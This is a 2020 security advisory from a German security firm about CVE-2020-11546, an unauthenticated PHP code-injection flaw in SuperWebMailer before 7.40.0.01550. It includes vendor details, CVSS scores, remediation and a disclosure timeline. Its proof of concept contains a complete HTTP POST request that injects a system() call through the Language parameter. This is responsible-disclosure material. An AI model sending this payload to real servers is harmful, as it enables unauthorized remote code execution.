Advisory: SuperWebMailer < 7.40.0.01550 Unauthenticated Remote Code Execution (CVE-2020-11546)

gepostet am 14.07.2020 von und

Die Versionen vor 7.40.0.01550 des SuperWebMailer sind anfällig für eine Remote Code Execution Sicherheitslücke (RCE). Die Anwendung verarbeitet die Language-Variable ohne ausreichende Sicherheitsprüfung und reicht diese intern in ein eval(), was einem unauthentifizierten Angreifer die Ausführung von beliebigem PHP Code im Kontext des Webservers erlaubt (CWE-94). Die Sicherheitslücke ist laut Hersteller in Version 7.40.0.01550 behoben worden (8.4.2020).

Detailed Security Advisory

Advisory ID: TO-2020-001
Product: SuperWebMailer
Vendor: Mirko Böer Softwareentwicklungen, Leipzig
Tested Version: 7.21.0.01526
Fixed Version: 7.40.0.01550 (released 2020-04-08)
Vulnerability Type: Unauthenticated Remote PHP Code Injection
CVSS Risk: 10.0
CVSSv3: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Mitigation: Installation of the software upgrade provided by the vendor
CWE Reference: CWE-94
CVE Reference: CVE-2020-11546
Authors: Tobias Györfi and Dimitri Lesy, Thinking Objects GmbH

Overview

SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the „Language“ parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this to execute arbitrary PHP code in the webserver’s context.

Proof of Concept

The following request triggers the execution of „ls -lah“ on the remote system:

POST /mailingupgrade.php HTTP/1.1
Host: XXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: XXXXXXXXX/mailingupgrade.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: XXXXXXXXX
Connection: close
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXX
Upgrade-Insecure-Requests: 1

step=4&Language=de%7b$%7bsystem(%22ls%20-alh%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E

 

Server response:

Advisory: Superwebmailer

Remediation

Installation of the software upgrade version 7.40.0.01550 provided by the vendor.

Disclosure Timeline

2020-03-27: Vulnerability discovered
2020-03-30: Vulnerability reported to vendor
2020-03-30: Vendor response
2020-04-04: CVE reserved
2020-07-06: Verification that the vulnerability no longer exists in version 7.50.0.01560
2020-07-14: Vulnerability disclosed

References

[1] Advisory URL: https://blog.to.com/advisory-superwebmailer-cve-2020-11546
[2] Superwebmailer Website: https://www.superwebmailer.de/

Disclaimer

The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on blog.to.com.

Copyright: Creative Commons – Attribution (by) – Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Autor/in

Tobias
Györfi

IT-Security Consultant

Top Blogbeiträge

Verlehrsschilderwald
Wissen Sie, was auf ihrer Firewall vor sich geht?
Corona-Warn-App – Welche Daten werden geteilt?
MVSS
Vulnerability Scan – Grenzen und Chancen

Dies könnte Sie auch interessieren

AdvisoryCVE-2020-11546PHPSuperwebmailer

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

CAPTCHA *